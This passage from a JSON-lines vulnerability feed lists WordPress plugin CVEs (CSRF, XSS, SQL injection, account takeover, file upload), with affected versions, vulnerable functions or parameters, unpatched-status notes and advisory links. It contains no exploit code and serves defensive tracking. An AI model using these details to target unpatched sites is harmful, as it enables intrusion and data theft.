ss-give-donors-query.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157829\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157829\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12218","slug":"woocommerce-check-pincode-zipcode-for-shipping","versionImpact":"2.0.4","description":"The Woocommerce check pincode\/zipcode for shipping plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.4. This is due to missing or incorrect nonce validation. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-check-pincode-zipcode-for-shipping\\\/trunk\\\/classes\\\/pincode-list.php#L93\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-check-pincode-zipcode-for-shipping\\\/trunk\\\/classes\\\/pincode-list.php#L93\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woocommerce-check-pincode-zipcode-for-shipping\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woocommerce-check-pincode-zipcode-for-shipping\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b79b5ae-7ce5-4065-8d7c-487df6752bc7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b79b5ae-7ce5-4065-8d7c-487df6752bc7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13696","slug":"flexible-wishlist","versionImpact":"1.2.25","description":"The Flexible Wishlist for WooCommerce \u2013 Ecommerce Wishlist & Save for later plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018wishlist_name\u2019 parameter in all versions up to, and including, 1.2.25 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flexible-wishlist\\\/trunk\\\/assets\\\/js\\\/front.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flexible-wishlist\\\/trunk\\\/assets\\\/js\\\/front.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3230370\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3230370\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/flexible-wishlist\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/flexible-wishlist\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/112456a9-8bb6-4007-87da-6d0fba912498?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/112456a9-8bb6-4007-87da-6d0fba912498?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11285","slug":"wp-jobhunt","versionImpact":"7.1","description":"The WP JobHunt plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 7.1. This is due to the plugin not properly validating a user's identity prior to updating their details like email via the account_settings_callback() function. This makes it possible for unauthenticated attackers to change arbitrary user's email addresses, including administrators, and leverage that to reset the user's password and gain access to their account.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/jobcareer-job-board-responsive-wordpress-theme\\\/14221636\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/jobcareer-job-board-responsive-wordpress-theme\\\/14221636\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e61c98d-a6f4-4ac0-b9f9-2b936c030413?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e61c98d-a6f4-4ac0-b9f9-2b936c030413?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4337","slug":"ahathat","versionImpact":"1.6","description":"The AHAthat Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.6. This is due to missing or incorrect nonce validation on the aha_plugin_page() function. This makes it possible for unauthenticated attackers to delete AHA pages via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ahathat\\\/trunk\\\/includes\\\/class-aha-admin-menu.php#L42\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ahathat\\\/trunk\\\/includes\\\/class-aha-admin-menu.php#L42\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af15ae80-dbce-4899-9604-82fdca222bf5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af15ae80-dbce-4899-9604-82fdca222bf5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-47556","slug":"css3_web_pricing_tables_grids","versionImpact":"11.5","description":"Missing Authorization vulnerability in QuanticaLabs CSS3 Compare Pricing Tables for WordPress allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects CSS3 Compare Pricing Tables for WordPress: from n\/a through 11.5.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/css3_web_pricing_tables_grids\\\/vulnerability\\\/wordpress-css3-compare-pricing-tables-for-wordpress-11-5-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/css3_web_pricing_tables_grids\\\/vulnerability\\\/wordpress-css3-compare-pricing-tables-for-wordpress-11-5-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6086","slug":"csv-me","versionImpact":"2.0","description":"The CSV Me plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the 'csv_me_options_page' function in all versions up to, and including, 2.0. This makes it possible for authenticated attackers, with Administrator-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/csv-me\\\/trunk\\\/csv_me_index.php#L49\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/csv-me\\\/trunk\\\/csv_me_index.php#L49\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83bf3f3d-49f1-473a-a9ee-d78eb8981ad3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83bf3f3d-49f1-473a-a9ee-d78eb8981ad3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1372","slug":"wh-testimonials","versionImpact":"3.0.0","description":"The WH Testimonials plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several parameters such as wh_homepage, wh_text_short, wh_text_full and in versions up to, and including, 3.0.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6fe5f1a-787e-4662-915f-c6f04961e194\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6fe5f1a-787e-4662-915f-c6f04961e194\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/danielkelley.me\\\/wh-testimonials-reflected-xss-vulnerability-via-wh-homepage-parameter-in-version-3-0-0-and-below\\\/\",\"name\":\"https:\\\/\\\/danielkelley.me\\\/wh-testimonials-reflected-xss-vulnerability-via-wh-homepage-parameter-in-version-3-0-0-and-below\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wh-testimonials\\\/trunk\\\/wh-testimonials.php#L177\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wh-testimonials\\\/trunk\\\/wh-testimonials.php#L177\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0267","slug":"ultimate-carousel-for-visual-composer","versionImpact":"2.6","description":"The Ultimate Carousel For WPBakery Page Builder WordPress plugin through 2.6 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7ba7849d-e07b-465a-bfb7-10c8186be140\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7ba7849d-e07b-465a-bfb7-10c8186be140\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2893","slug":"wp-easycart","versionImpact":"5.4.8","description":"The WP EasyCart plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 5.4.8. This is due to missing or incorrect nonce validation on the process_deactivate_product function. This makes it possible for unauthenticated attackers to deactivate products via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1268604c-08eb-4d86-8e97-9cdaa3e19c1f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1268604c-08eb-4d86-8e97-9cdaa3e19c1f?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2917958\\\/wp-easycart\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2917958\\\/wp-easycart\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4417","slug":"forminator","versionImpact":"1.13.4","description":"The Forminator \u2013 Contact Form, Payment Form & Custom Form Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.13.4. This is due to missing or incorrect nonce validation on the listen_for_saving_export_schedule() function. This makes it possible for unauthenticated attackers to export form submissions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2368977\\\/forminator\\\/trunk\\\/library\\\/class-export.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2368977\\\/forminator\\\/trunk\\\/library\\\/class-export.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cdee0cd8-b83b-4436-aebe-533f5af03ef1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cdee0cd8-b83b-4436-aebe-533f5af03ef1?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4153","slug":"ban-users","versionImpact":"1.5.3","description":"The BAN Users plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 1.5.3 due to a missing capability check on the 'w3dev_save_ban_user_settings_callback' function. This makes it possible for authenticated attackers, with minimal permissions such as a subscriber, to modify the plugin settings to access the ban and unban functionality and set the role of the unbanned user.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af6bd2db-47a4-4381-a881-d5f97a159f8d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af6bd2db-47a4-4381-a881-d5f97a159f8d?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ban-users\\\/tags\\\/1.5.3\\\/include\\\/ajax.php#L109\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ban-users\\\/tags\\\/1.5.3\\\/include\\\/ajax.php#L109\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ban-users\\\/tags\\\/1.5.3\\\/include\\\/ajax.php#L199\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ban-users\\\/tags\\\/1.5.3\\\/include\\\/ajax.php#L199\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4857","slug":"fs-product-inquiry","versionImpact":"1.1.1","description":"The FS Product Inquiry WordPress plugin through 1.1.1 does not sanitise and escape some form submissions, which could allow unauthenticated users to perform Stored Cross-Site Scripting attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bf1b8434-b361-4666-9058-d9f08c09d083\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bf1b8434-b361-4666-9058-d9f08c09d083\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5605","slug":"media-library-assistant","versionImpact":"3.16","description":"The Media Library Assistant plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018order\u2019 parameter within the mla_tag_cloud Shortcode in all versions up to, and including, 3.16 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ba8a9f5-0633-4cf0-af27-5466d93e9020?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ba8a9f5-0633-4cf0-af27-5466d93e9020?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/trunk\\\/includes\\\/class-mla-shortcode-support.php#L2783\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/trunk\\\/includes\\\/class-mla-shortcode-support.php#L2783\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/media-library-assistant\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/media-library-assistant\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3098232%40media-library-assistant&new=3098232%40media-library-assistant&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3098232%40media-library-assistant&new=3098232%40media-library-assistant&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12406","slug":"library-management-system","versionImpact":"3.0.0","description":"The Library Management System \u2013 Manage e-Digital Books Library plugin for WordPress is vulnerable to SQL Injection via the 'owt7_borrow_books_id' parameter in all versions up to, and including, 3.0.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/library-management-system\\\/trunk\\\/admin\\\/class-library-management-system-admin.php#L1882\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/library-management-system\\\/trunk\\\/admin\\\/class-library-management-system-admin.php#L1882\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0b4cb873-77b7-44f9-820c-38e5d43393f3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0b4cb873-77b7-44f9-820c-38e5d43393f3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12697","slug":"real-kit","versionImpact":"5.1.1","description":"The real.Kit plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 5.1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/real-kit\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/real-kit\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83e1f631-28ec-4924-9d69-caaba00fe276?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83e1f631-28ec-4924-9d69-caaba00fe276?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12749","slug":"competition-form","versionImpact":"2.0","description":"The Competition Form WordPress plugin through 2.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/478316b9-9f47-4aa6-92c6-03879f16a3e5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/478316b9-9f47-4aa6-92c6-03879f16a3e5\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/478316b9-9f47-4aa6-92c6-03879f16a3e5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/478316b9-9f47-4aa6-92c6-03879f16a3e5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13493","slug":"sensly-online-presence","versionImpact":"0.6","description":"The Sensly Online Presence WordPress plugin through 0.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dfbdd474-92e5-422b-a185-e441a6014557\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dfbdd474-92e5-422b-a185-e441a6014557\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13750","slug":"multilevel-referral-plugin-for-woocommerce","versionImpact":"2.27","description":"The Multilevel Referral Affiliate Plugin for WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'orderby' parameter in all versions up to, and including, 2.27 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multilevel-referral-plugin-for-woocommerce\\\/tags\\\/2.27\\\/classes\\\/referral-program.php#L310\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multilevel-referral-plugin-for-woocommerce\\\/tags\\\/2.27\\\/classes\\\/referral-program.php#L310\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4389ddc9-de69-4316-9bfa-ff3bd3346c69?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4389ddc9-de69-4316-9bfa-ff3bd3346c69?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11284","slug":"wp-jobhunt","versionImpact":"7.1","description":"The WP JobHunt plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 6.9. This is due to the plugin not properly validating a user's identity prior to updating their password through the account_settings_save_callback() function. This makes it possible for unauthenticated attackers to change arbitrary user's passwords, including administrators, and leverage that to gain access to their account.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/jobcareer-job-board-responsive-wordpress-theme\\\/14221636\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/jobcareer-job-board-responsive-wordpress-theme\\\/14221636\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8afe386e-1e4f-4668-8309-6d47dedb008a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8afe386e-1e4f-4668-8309-6d47dedb008a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2802","slug":"layoutboxx","versionImpact":"0.3.1","description":"The LayoutBoxx plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 0.3.1. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/layoutboxx\\\/trunk\\\/layoutboxx.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/layoutboxx\\\/trunk\\\/layoutboxx.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/layoutboxx\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/layoutboxx\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc3fcb8f-f130-4008-8f11-d98efa30f1a8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc3fcb8f-f130-4008-8f11-d98efa30f1a8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-47534","slug":"wp-auto-spinner","versionImpact":"3.25.0","description":"Missing Authorization vulnerability in ValvePress Wordpress Auto Spinner allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Wordpress Auto Spinner: from n\/a through 3.25.0.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-auto-spinner\\\/vulnerability\\\/wordpress-wordpress-auto-spinner-3-25-0-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-auto-spinner\\\/vulnerability\\\/wordpress-wordpress-auto-spinner-3-25-0-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5237","slug":"brid-video-easy-publish","versionImpact":"3.8.5","description":"The Target Video Easy Publish plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018width\u2019 parameter in all versions up to, and including, 3.8.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brid-video-easy-publish\\\/trunk\\\/lib\\\/BridShortcode.php#L221\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brid-video-easy-publish\\\/trunk\\\/lib\\\/BridShortcode.php#L221\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3309639\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3309639\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/brid-video-easy-publish\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/brid-video-easy-publish\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b10333f8-fd90-43a7-8404-71954ee29e47?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b10333f8-fd90-43a7-8404-71954ee29e47?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
